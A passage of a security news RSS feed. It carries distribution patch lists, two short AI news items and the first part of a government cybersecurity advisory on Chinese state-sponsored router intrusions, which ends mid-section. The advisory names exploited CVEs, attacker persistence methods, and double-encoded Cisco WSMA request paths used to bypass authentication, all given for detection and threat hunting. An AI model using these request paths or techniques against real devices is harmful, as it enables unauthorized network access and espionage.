<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (ffmpeg, firefox-esr, libsndfile, and rear), <b>Fedora</b> (httpd, perl-CGI-Simple, and tinyproxy), <b>Oracle</b> (firefox, kernel, libsoup, mysql8.4, tigervnc, tomcat, tomcat9, and uek-kernel), <b>SUSE</b> (alloy, curl, dovecot24, fontforge, glib2, himmelblau, java-17-openjdk, java-21-openjdk, kernel, krb5, lasso, libvirt, mozjs128, mysql-connector-java, nvidia-open-driver-G07-signed-check, openssh, poppler, postgresql17, postgresql18, python-cbor2, python-Django, python310, python311-Django, runc, strongswan, tomcat11, and xwayland), and <b>Ubuntu</b> (binutils, libpng1.6, linux, linux-aws, linux-aws-5.4, linux-gcp, linux-gcp-5.4, linux-hwe-5.4,
 linux-ibm, linux-ibm-5.4, linux-kvm, linux-oracle, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-6.14, linux-gcp, linux-hwe-6.14, linux-raspi, linux, linux-aws, linux-gcp, linux-realtime, and qtbase-opensource-src).]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft AI Releases VibeVoice-Realtime: A Lightweight Real‑Time Text-to-Speech Model Supporting Streaming Text Input and Robust Long-Form Speech Generation]]></title>
<description><![CDATA[Microsoft has released VibeVoice-Realtime-0.5B, a real time text to speech model that works with streaming text input and long form speech output, aimed at agent style applications and live data narration. The model can start producing audible speech in about 300 ms, which is critical when a lang...]]></description>
<link>https://tsecurity.de/de/3143418/ai-nachrichten/microsoft-ai-releases-vibevoice-realtime-alightweight-realtimetext-to-speech-model-supportingstreaming-text-inputandrobust-long-form-speech-generation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3143418/ai-nachrichten/microsoft-ai-releases-vibevoice-realtime-alightweight-realtimetext-to-speech-model-supportingstreaming-text-inputandrobust-long-form-speech-generation/</guid>
<pubDate>Sun, 07 Dec 2025 06:33:15 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft has released VibeVoice-Realtime-0.5B, a real time text to speech model that works with streaming text input and long form speech output, aimed at agent style applications and live data narration. The model can start producing audible speech in about 300 ms, which is critical when a language model is still generating the rest of […]</p>
<p>The post <a href="https://www.marktechpost.com/2025/12/06/microsoft-ai-releases-vibevoice-realtime-a-lightweight-real%E2%80%91time-text-to-speech-model-supporting-streaming-text-input-and-robust-long-form-speech-generation/">Microsoft AI Releases VibeVoice-Realtime: A Lightweight Real‑Time Text-to-Speech Model Supporting Streaming Text Input and Robust Long-Form Speech Generation</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Build Hour: Agent Memory Patterns]]></title>
<description><![CDATA[Author: OpenAI - Bewertung: 53x - Views:626 AI agents don’t just reason — they remember. In this Build Hour, we deep-dive into context engineering techniques that enable agents to maintain short-term and long-term memory, personalize interactions, and operate reliably across long-running workflow...]]></description>
<link>https://tsecurity.de/de/3139488/videos/build-hour-agent-memory-patterns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3139488/videos/build-hour-agent-memory-patterns/</guid>
<pubDate>Thu, 04 Dec 2025 21:46:42 +0100</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/WsGVXiWzTpI/hqdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<p>Author: OpenAI - Bewertung: 53x - Views:626 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/WsGVXiWzTpI?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>AI agents don’t just reason — they remember. In this Build Hour, we deep-dive into context engineering techniques that enable agents to maintain short-term and long-term memory, personalize interactions, and operate reliably across long-running workflows.<br />
<br />
<br />
Emre Okcular (Solutions Architect) covers:<br />
• Why memory matters: stability, personalization, and long-running agent workflows<br />
• Short-term memory patterns: Sessions, context trimming, compaction, summarization<br />
• Long-term memory patterns: state objects, structured notes, memory-as-a-tool<br />
• Architectures: token-aware sessions, state injection strategies, guardrails, and memory triggers<br />
• Live demo: building an end-to-end agent with dynamic short and long term memory<br />
• Best practices: avoiding context poisoning, context burst, context noise and context conflict.<br />
• Live Q&A<br />
<br />
👉 Context Engineering Cookbook: https://cookbook.openai.com/examples/agents_sdk/session_memory<br />
👉 OpenAI Agents Python SDK: https://openai.github.io/openai-agents-python/<br />
👉 Context Summarization with Realtime Cookbook: https://cookbook.openai.com/examples/context_summarization_with_realtime_api<br />
👉 Follow along with the code repo: https://github.com/openai/build-hours<br />
👉 Sign up for upcoming live Build Hours: https://webinar.openai.com/buildhours/<br />
<br />
00:00 Context Engineering<br />
10:44 Context Lifecycle Demo<br />
20:13 Context Engineering Techniques<br />
26:49 Reshape + Fit Demo <br />
39:16 Conclusion<br />
42:45 Q&A<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (expat and libxml2), Debian (openvpn and webkit2gtk), Fedora (gi-loadouts, kf6-kcoreaddons, kf6-kguiaddons, kf6-kjobwidgets, kf6-knotifications, kf6-kstatusnotifieritem, kf6-kunitconversion, kf6-kwidgetsaddons, kf6-kxmlgui, nanovna-saver, persepolis,...]]></description>
<link>https://tsecurity.de/de/3138623/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3138623/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 04 Dec 2025 15:08:26 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (expat and libxml2), <b>Debian</b> (openvpn and webkit2gtk), <b>Fedora</b> (gi-loadouts, kf6-kcoreaddons, kf6-kguiaddons, kf6-kjobwidgets, kf6-knotifications, kf6-kstatusnotifieritem, kf6-kunitconversion, kf6-kwidgetsaddons, kf6-kxmlgui, nanovna-saver, persepolis, python-ezdxf, python-pyside6, sigil, stb, syncplay, tinyproxy, torbrowser-launcher, ubertooth, and usd), <b>Mageia</b> (cups), <b>SUSE</b> (cups, gegl, icinga2, mozjs128, and Security), and <b>Ubuntu</b> (ghostscript, kernel, linux, linux-aws, linux-aws-5.15, linux-gcp-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iotg, linux-intel-iotg-5.15, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx, linux-oracle, linux-oracle-5.15, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-hwe, linux-kvm, linux-oracle, linux-aws-fips, linux-fips, linux-aws-fips, linux-fips, linux-gcp-fips, linux-azure-fips, linux-gcp, linux-gcp-4.15, linux-hwe, linux-gcp, linux-gcp-6.8, linux-gke, linux-gkeop, linux-gcp-6.14, linux-raspi, linux-gcp-fips, linux-intel-iot-realtime, linux-realtime, linux-raspi, linux-raspi-realtime, linux-xilinx, and postgresql-14, postgresql-16, postgresql-17).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (containerd, mako, and xen), Fedora (forgejo, nextcloud, openbao, rclone, restic, and tigervnc), Oracle (firefox, kernel, libtiff, libxml2, and postgresql), SUSE (libecpg6, lightdm-kde-greeter, python-cbor2, python-mistralclient-doc, python315, and pyth...]]></description>
<link>https://tsecurity.de/de/3136226/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3136226/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 03 Dec 2025 15:20:44 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (containerd, mako, and xen), <b>Fedora</b> (forgejo, nextcloud, openbao, rclone, restic, and tigervnc), <b>Oracle</b> (firefox, kernel, libtiff, libxml2, and postgresql), <b>SUSE</b> (libecpg6, lightdm-kde-greeter, python-cbor2, python-mistralclient-doc, python315, and python39), and <b>Ubuntu</b> (kdeconnect, linux, linux-aws, linux-realtime, python-django, and unbound).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (bind, binutils, delve and golang, expat, firefox, haproxy, kernel, libsoup3, libssh, libtiff, openssh, openssl, pam, podman, python-kdcproxy, shadow-utils, squid, thunderbird, vim, xorg-x11-server-Xwayland, and zziplib), Debian (cups-filters, libsdl...]]></description>
<link>https://tsecurity.de/de/3121886/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3121886/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 26 Nov 2025 15:37:09 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (bind, binutils, delve and golang, expat, firefox, haproxy, kernel, libsoup3, libssh, libtiff, openssh, openssl, pam, podman, python-kdcproxy, shadow-utils, squid, thunderbird, vim, xorg-x11-server-Xwayland, and zziplib), <b>Debian</b> (cups-filters, libsdl2, linux-6.1, net-snmp, pdfminer, rails, and tryton-sao), <b>Fedora</b> (chromium, docker-buildkit, docker-buildx, and sudo-rs), <b>Gentoo</b> (librnp), <b>Mageia</b> (webkit2), <b>SUSE</b> (amazon-ssm-agent, buildah, curl, dpdk, fontforge-20251009, kernel, libIex-3_4-33, librnp0, python311, rclone, and sssd), and <b>Ubuntu</b> (linux, linux-aws, linux-aws-6.8, linux-ibm, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-oracle, linux-aws-6.14, linux-oracle-6.14, linux-aws-fips, linux-fips, linux-gcp-fips, linux-realtime, linux-realtime-6.8, mupdf, openjdk-17, openjdk-8, and openjdk-lts).]]></content:encoded>
</item>
<item>
<title><![CDATA[„Vom Experience Center zum monumentalen Signage-Projekt“]]></title>
<description><![CDATA[Digitale Erlebnisräume verlangen nach flexiblen Lösungen für ständig wechselnde Inhalte und individuelle Formate. Realtime Department hat dafür die modulare Plattform UNIQVUE entwickelt – Geschäftsführer Christoph Gockel erläutert, wie sie ...]]></description>
<link>https://tsecurity.de/de/3120991/android-tipps/vom-experience-center-zum-monumentalen-signage-projekt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3120991/android-tipps/vom-experience-center-zum-monumentalen-signage-projekt/</guid>
<pubDate>Wed, 26 Nov 2025 08:52:18 +0100</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Digitale Erlebnisräume verlangen nach flexiblen Lösungen für ständig wechselnde Inhalte und individuelle Formate. Realtime Department hat dafür die modulare Plattform UNIQVUE entwickelt – Geschäftsführer Christoph Gockel erläutert, wie sie ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (buildah, firefox, go-rpm-macros, kernel, kernel-rt, podman, and thunderbird), Debian (erlang, python-gevent, and r-cran-gh), Fedora (buildah, chromium, k9s, kubernetes1.33, kubernetes1.34, podman, python-mkdocs-include-markdown-plugin, and webkitgtk...]]></description>
<link>https://tsecurity.de/de/3119646/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3119646/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 25 Nov 2025 15:51:37 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (buildah, firefox, go-rpm-macros, kernel, kernel-rt, podman, and thunderbird), <b>Debian</b> (erlang, python-gevent, and r-cran-gh), <b>Fedora</b> (buildah, chromium, k9s, kubernetes1.33, kubernetes1.34, podman, python-mkdocs-include-markdown-plugin, and webkitgtk), <b>Gentoo</b> (Chromium, Google Chrome, Microsoft Edge. Opera, qtsvg, redict, redis, UDisks, and WebKitGTK+), <b>Mageia</b> (cups-filters and ruby-rack), <b>Oracle</b> (kernel and libssh), <b>Red Hat</b> (.NET 8.0, tigervnc, xorg-x11-server, and xorg-x11-server-Xwayland), <b>SUSE</b> (act, bind, cups-filters, govulncheck-vulndb, grub2, libebml, python39, and tcpreplay), and <b>Ubuntu</b> (linux-raspi, linux-raspi-realtime, openjdk-21, openjdk-25, python3.12, python3.11, python3.10, python3.9, python3.8, python3.7, python3.6, python3.5, python3.4, and runc-app, runc-stable).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Fedora (calibre, chromium, cri-o1.32, cri-o1.33, cri-o1.34, dotnet10.0, dovecot, gnutls, gopass, gopass-hibp, gopass-jsonapi, kubernetes1.31, kubernetes1.32, kubernetes1.33, kubernetes1.34, and linux-firmware), Mageia (ffmpeg, kernel, kmod-xtables-addons & kmo...]]></description>
<link>https://tsecurity.de/de/3117274/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3117274/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 24 Nov 2025 15:13:55 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Fedora</b> (calibre, chromium, cri-o1.32, cri-o1.33, cri-o1.34, dotnet10.0, dovecot, gnutls, gopass, gopass-hibp, gopass-jsonapi, kubernetes1.31, kubernetes1.32, kubernetes1.33, kubernetes1.34, and linux-firmware), <b>Mageia</b> (ffmpeg, kernel, kmod-xtables-addons &amp; kmod-virtualbox, kernel-linus, konsole, and redis), <b>Red Hat</b> (bind and bind-dyndb-ldap and kernel), <b>SUSE</b> (act, alloy, amazon-ssm-agent, ansible-12, ansible-core, blender, chromium, cups-filters, curl, elfutils, expat, firefox, glib2, grub2, helm, kernel, libipa_hbac-devel, libxslt, nvidia-container-toolkit, ongres-scram, openexr, podman, poppler, runc, samba, sssd, thunderbird, and tomcat), and <b>Ubuntu</b> (cups-filters, linux, linux-aws, linux-gcp, linux-hwe-6.14, linux-oracle, linux-realtime, linux-oem-6.14, and linux-realtime-6.14).]]></content:encoded>
</item>
<item>
<title><![CDATA[Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System]]></title>
<description><![CDATA[Executive summary
People’s Republic of China (PRC) state-sponsored cyber threat actors are targeting networks globally, including, but not limited to, telecommunications, government, transportation, lodging, and military infrastructure networks. While these actors focus on large backbone routers ...]]></description>
<link>https://tsecurity.de/de/3113765/sicherheitsluecken/countering-chinese-state-sponsored-actors-compromise-of-networks-worldwide-to-feed-global-espionage-system/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3113765/sicherheitsluecken/countering-chinese-state-sponsored-actors-compromise-of-networks-worldwide-to-feed-global-espionage-system/</guid>
<pubDate>Sat, 22 Nov 2025 09:52:03 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><strong>Executive summary</strong></h2>
<p>People’s Republic of China (PRC) state-sponsored cyber threat actors are targeting networks globally, including, but not limited to, telecommunications, government, transportation, lodging, and military infrastructure networks. While these actors focus on large backbone routers of major telecommunications providers, as well as provider edge (PE) and customer edge (CE) routers, they also leverage compromised devices and trusted connections to pivot into other networks. These actors often modify routers to maintain persistent, long-term access to networks. </p>
<p>This activity partially overlaps with cyber threat actor reporting by the cybersecurity industry—commonly referred to as Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor, among others. The authoring agencies are not adopting a particular commercial naming convention and hereafter refer to those responsible for the cyber threat activity more generically as “Advanced Persistent Threat (APT) actors” throughout this advisory. This cluster of cyber threat activity has been observed in the United States, Australia, Canada, New Zealand, the United Kingdom, and other areas globally.</p>
<p>This Cybersecurity Advisory (CSA) includes observations from various government and industry investigations where the APT actors targeted internal enterprise environments, as well as systems and networks that deliver services directly to customers. This CSA details the tactics, techniques, and procedures (TTPs) leveraged by these APT actors to facilitate detection and threat hunting, and provides mitigation guidance to reduce the risk from these APT actors and their TTPs.</p>
<p>This CSA is being released by the following authoring and co-sealing agencies:</p>
<ul>
<li>United States National Security Agency (NSA)</li>
<li>United States Cybersecurity and Infrastructure Security Agency (CISA)</li>
<li>United States Federal Bureau of Investigation (FBI)</li>
<li>United States Department of Defense Cyber Crime Center (DC3)</li>
<li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li>
<li>Canadian Centre for Cyber Security (Cyber Centre)</li>
<li>Canadian Security Intelligence Service (CSIS)</li>
<li>New Zealand National Cyber Security Centre (NCSC-NZ)</li>
<li>United Kingdom National Cyber Security Centre (NCSC-UK)</li>
<li>Czech Republic National Cyber and Information Security Agency (NÚKIB) - Národní úřad pro kybernetickou a informační bezpečnost</li>
<li>Finnish Security and Intelligence Service (SUPO) - Suojelupoliisi</li>
<li>Germany Federal Intelligence Service (BND) - Bundesnachrichtendienst</li>
<li>Germany Federal Office for the Protection of the Constitution (BfV) -   Bundesamt für Verfassungsschutz</li>
<li>Germany Federal Office for Information Security (BSI) - Bundesamt für Sicherheit in der Informationstechnik</li>
<li>Italian External Intelligence and Security Agency (AISE) - Agenzia Informazioni e Sicurezza Esterna</li>
<li>Italian Internal Intelligence and Security Agency (AISI) - Agenzia Informazioni e Sicurezza Interna</li>
<li>Japan National Cybersecurity Office (NCO) - 国家サイバー統括室</li>
<li>Japan National Police Agency (NPA) - 警察庁</li>
<li>Netherlands Defence Intelligence and Security Service (MIVD) - Militaire Inlichtingen- en Veiligheidsdienst</li>
<li>Netherlands General Intelligence and Security Service (AIVD) - Algemene Inlichtingen- en Veiligheidsdienst</li>
<li>Polish Military Counterintelligence Service (SKW) - Służba Kontrwywiadu Wojskowego</li>
<li>Polish Foreign Intelligence Agency (AW) - Agencja Wywiadu</li>
<li>Spain National Intelligence Centre (CNI) - Centro Nacional de Inteligencia</li>
</ul>
<p>The authoring agencies strongly urge network defenders to hunt for malicious activity and to apply the mitigations in this CSA to reduce the threat of Chinese state-sponsored and other malicious cyber activity.</p>
<p>Any mitigation or eviction measures listed within are subject to change as new information becomes available and ongoing coordinated operations dictate. Network defenders should ensure any actions taken in response to the CSA are compliant with local laws and regulations within the jurisdictions within which they operate. </p>
<h2><strong>Background</strong></h2>
<p>The APT actors have been performing malicious operations globally since at least 2021. These operations have been linked to multiple China-based entities, including at least Sichuan Juxinhe Network Technology Co. Ltd. (四川聚信和网络科技有限公司), Beijing Huanyu Tianqiong Information Technology Co., Ltd. (北京寰宇天穹信息技术有限公司), and Sichuan Zhixin Ruijie Network Technology Co., Ltd. (四川智信锐捷网络科技有限公司). These companies provide cyber-related products and services to China’s intelligence services, including multiple units in the People’s Liberation Army and Ministry of State Security. The data stolen through this activity against foreign telecommunications and Internet service providers (ISPs), as well as intrusions in the lodging and transportation sectors, ultimately can provide Chinese intelligence services with the capability to identify and track their targets’ communications and movements around the world.</p>
<p>For more information on PRC state-sponsored malicious cyber activity, see <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/nation-state-cyber-actors/china" title="CISA’s People's Republic of China Cyber Threat Overview and Advisories" data-entity-type="node" data-entity-uuid="9e5c2f96-5939-4cf1-a87c-28cd081a24fc" data-entity-substitution="canonical">CISA’s People's Republic of China Cyber Threat Overview and Advisories</a> webpage.</p>
<p><strong>Download the PDF version of this report:</strong></p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-09/CSA_COUNTERING_CHINA_STATE_ACTORS_COMPROMISE_OF_NETWORKS.pdf" class="c-file__link" target="_blank">CSA COUNTERING CHINA STATE ACTORS COMPROMISE OF NETWORKS</a>
    <span class="c-file__size">(PDF,       1.09 MB
  )</span>
  </div>
</div>
<p><strong>For a downloadable list of IOCs, visit:</strong></p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-09/AA25-239A_Countering_Chinese_State-Sponsored_Actors_Compromise_of_Networks_Worldwide_to_Feed_Global_Espionage_System.stix_.json" class="c-file__link" target="_blank">AA25-239A Countering Chinese State-Sponsored Actors Compromise of Networks to Feed Global Espionage System</a>
    <span class="c-file__size">(JSON,       86.01 KB
  )</span>
  </div>
</div>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-09/AA25-239A_Countering_Chinese_State-Sponsored_Actors_Compromise_of_Networks_Worldwide_to_Feed_Global_Espionage_System.stix_.xml" class="c-file__link" target="_blank">AA25-239A Countering Chinese State-Sponsored Actors Compromise of Networks to Feed Global Espionage System</a>
    <span class="c-file__size">(XML,       66.50 KB
  )</span>
  </div>
</div>
<h2><strong>Cybersecurity Industry Tracking </strong></h2>
<p>The cybersecurity industry provides overlapping cyber threat intelligence, indicators of compromise (IOCs), and mitigation recommendations related to this Chinese state-sponsored cyber activity. While not all encompassing, the following are the most notable threat group names related to this activity and commonly used within the cybersecurity community:</p>
<ul>
<li>Salt Typhoon,</li>
<li>OPERATOR PANDA,</li>
<li>RedMike,</li>
<li>UNC5807, and</li>
<li>GhostEmperor. </li>
</ul>
<p><strong>Note</strong>: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the authoring agencies’ understanding for all activity related to these groupings.</p>
<h2><strong>Technical details</strong></h2>
<p>The following sections are a compilation of TTPs the APT actors have used since at least 2021 to target enterprise environments. Particularly notable TTPs include modifying router configurations for lateral movement pivoting between networks and using virtualized containers on network devices to evade detection. The actors continue to use many of the TTPs listed, but expect them to evolve when existing TTPs no longer achieve their goals. Even if no longer used regularly, the actors may still use previous TTPs opportunistically in favorable conditions. The TTP descriptions can also be useful to network defenders for retroactive threat hunting.</p>
<p><strong>Note</strong>: This advisory uses the <a href="https://attack.mitre.org/versions/v17/matrices/enterprise/" target="_blank" title="MITRE ATT&amp;CK® for Enterprise framework, version 17">MITRE ATT&amp;CK® for Enterprise framework, version 17</a> and <a href="https://attack.mitre.org/versions/v17/matrices/ics/" target="_blank" title="MITRE ATT&amp;CK for ICS framework, version 17">MITRE ATT&amp;CK for ICS framework, version 17</a>. See the <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#AppA" title="Appendix A">Appendix A: MITRE ATT&amp;CK Tactics and Techniques</a> section of this advisory for a table of the APT actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p>
<h3>Initial access</h3>
<p>Investigations associated with these APT actors indicate that they are having considerable success exploiting publicly known common vulnerabilities and exposures (CVEs) and other avoidable weaknesses within compromised infrastructure [<a href="https://attack.mitre.org/versions/v17/techniques/T1190/" target="_blank" title="T1190">T1190</a>]. Exploitation of zero-day vulnerabilities has not been observed to date. The APT actors will likely continue to adapt their tactics as new vulnerabilities are discovered and as targets implement mitigations, and will likely expand their use of existing vulnerabilities. The following list is not exhaustive and the authoring agencies suspect that the APT actors may target other devices (e.g., Fortinet firewalls, Juniper firewalls, Microsoft Exchange, Nokia routers and switches, Sierra Wireless devices, Sonicwall firewalls, etc.). </p>
<p>If not yet patched, defenders should prioritize the following CVEs due to their historical exploitation on exposed network edge devices by these APT actors. Example exploited CVEs, ordered by year, include:</p>
<ul>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-21887" target="_blank" title="CVE-2024-21887">CVE-2024-21887</a> - Ivanti Connect Secure and Ivanti Policy Secure web-component command injection vulnerability, commonly chained after CVE-2023-46805 (authentication bypass)</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-3400" target="_blank" title="CVE-2024-3400">CVE-2024-3400</a> - Palo Alto Networks PAN-OS GlobalProtect arbitrary file creation leading to OS command injection. The CVE allows for unauthenticated remote code execution (RCE) on firewalls when GlobalProtect is enabled on specific versions/configurations.</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2023-20273" target="_blank" title="CVE-2023-20273">CVE-2023-20273</a> - Cisco Internetworking Operating System (IOS) XE software web management user interface post-authentication command injection/privilege escalation (commonly chained with CVE-2023-20198 for initial access to achieve code execution as root) [<a href="https://attack.mitre.org/versions/v17/techniques/T1068/" target="_blank" title="T1068">T1068</a>]</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2023-20198" target="_blank" title="CVE-2023-20198">CVE-2023-20198</a> - Cisco IOS XE web user interface authentication bypass vulnerability
<ul>
<li>While exploiting CVE-2023-20198, the APT actors used the Web Services Management Agent (WSMA) endpoints <code>/webui_wsma_Http</code> or <code>/webui_wsma_Https</code> to bypass authentication and create unauthorized administrative accounts. In some cases, the APT actors obfuscated requests by “double encoding” portions of the path, e.g., <code>/%2577eb%2575i_%2577sma_Http</code> or <code>/%2577eb%2575i_%2577sma_Https</code> [<a href="https://attack.mitre.org/versions/v17/techniques/T1027/010/" target="_blank" title="T1027.010">T1027.010</a>]. Observed requests varied in case, so hunting and detection should be case-insensitive and tolerant of over-encoding.</li>
<li>After patching this CVE, WSMA endpoints requests are internally proxied, and the system adds a <code>Proxy-Uri-Source HTTP</code> header as part of the remediation logic. The presence of <code>Proxy-Uri-Source</code> header in traffic to <code>/webui_wsma_*</code> indicates a patched device handling the request, not exploitation. This can help distinguish between vulnerable and remediated systems when analyzing logs or captures.</li>
</ul>
</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2018-0171" target="_blank" title="CVE-2018-0171 ">CVE-2018-0171</a> - Cisco IOS and IOS XE smart install remote code execution vulnerability</li>
</ul>
<p>The APT actors leverage infrastructure, such as virtual private servers (VPSs) [<a href="https://attack.mitre.org/versions/v17/techniques/T1583/003/" target="_blank" title="T1583.003">T1583.003</a>] and compromised intermediate routers [<a href="https://attack.mitre.org/versions/v17/techniques/T1584/008/" target="_blank" title="T1584.008">T1584.008</a>], that have not been attributable to a publicly known botnet or obfuscation network infrastructure to target telecommunications and network service providers, including ISPs [<a href="https://attack.mitre.org/versions/v17/techniques/T1090/" target="_blank" title="T1090">T1090</a>]. </p>
<p>The APT actors may target edge devices regardless of who owns a particular device. Devices owned by entities who do not align with the actors’ core targets of interest still present opportunities for use in attack pathways into targets of interest. The actors leverage compromised devices and trusted connections or private interconnections (e.g., provider-to-provider or provider-to-customer links) to pivot into other networks [<a href="https://attack.mitre.org/versions/v17/techniques/T1199/" target="_blank" title="T1199">T1199</a>]. In some instances, the actors modify routing and enable traffic mirroring (switch port analyzer (SPAN)/remote SPAN (RSPAN)/encapsulated remote SPAN (ERSPAN) where available) on compromised network devices and configure Generic Routing Encapsulation (GRE)/IPsec tunnels and static routes to achieve the same goal [<a href="https://attack.mitre.org/versions/v17/techniques/T1095/" target="_blank" title="T1095">T1095</a>]. Additionally, these APT actors often simultaneously exploit large numbers of vulnerable, Internet-exposed devices across many IP addresses and may revisit individual systems for follow-on operations.</p>
<p>Initial access vectors remain a critical information gap for parties working to understand the scope, scale, and impact of the actors’ malicious activity. The authoring agencies encourage organizations to provide compromise details to appropriate authorities (see <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#Contactinfo" title="Contact Information">Contact information</a>) to continue improving all parties’ understanding and responses.</p>
<h3>Persistence</h3>
<p>To maintain persistent access to target networks, the APT actors use a variety of techniques. Notably, a number of these techniques can obfuscate the actors’ source IP address in system logs, as their actions may be recorded as originating from local IP addresses [<a href="https://attack.mitre.org/versions/v17/techniques/T1027/" target="_blank" title="T1027">T1027</a>]. Specific APT actions include:</p>
<ul>
<li>Modifying Access Control Lists (ACLs) to add IP addresses. This alteration allows the actors to bypass security policies and maintain ongoing access by explicitly permitting traffic from a threat actor-controlled IP address [<a href="https://attack.mitre.org/versions/v17/techniques/T1562/004/" target="_blank" title="T1562.004">T1562.004</a>].
<ul>
<li>The APT actors often named their ACLs “access-list 20”. When 20 was already used, the actors commonly used 50 or 10.</li>
</ul>
</li>
<li>Opening standard and non-standard ports, which can open and expose a variety of different services (e.g., Secure Shell [SSH], Secure File Transfer Protocol [SFTP], Remote Desktop Protocol [RDP], File Transfer Protocol [FTP], HTTP, HTTPS) [<a href="https://attack.mitre.org/versions/v17/techniques/T1071/" target="_blank" title="T1071">T1071</a>]. This strategy supplies multiple avenues for remote access and data exfiltration. Additionally, utilizing non-standard ports can help the APT actors evade detection by security monitoring tools that focus on standard port activity [<a href="https://attack.mitre.org/versions/v17/techniques/T1571/" target="_blank" title="T1571">T1571</a>].
<ul>
<li>The APT actors have been enabling SSH servers and opening external-facing ports on network devices to maintain encrypted remote access [<a href="https://attack.mitre.org/versions/v17/techniques/T1021/004/" target="_blank" title="T1021.004">T1021.004</a>]. In some cases, the SSH services were established on high, non-default Transmission Control Protocol (TCP) ports using the port numbering scheme of <code>22x22</code> or <code>xxx22</code>, though port patterns may vary across intrusions. The actors may add keys to existing SSH services to regain entry into network devices [<a href="https://attack.mitre.org/versions/v17/techniques/T1098/004/" target="_blank" title="T1098.004">T1098.004</a>].</li>
<li>The APT actors enable or abuse built-in HTTP/HTTPS management servers and sometimes reconfigure them to non-default high ports. <strong>Note: </strong>HTTP servers have been observed using the port numbering scheme of <code>18xxx</code>.
<ul>
<li>Enabling HTTP/HTTPS servers on Cisco devices affected by CVE-2023-20198. If the web UI feature is enabled on Cisco IOS XE Software, this vulnerability provides an entry opportunity for the APT actors.</li>
</ul>
</li>
</ul>
</li>
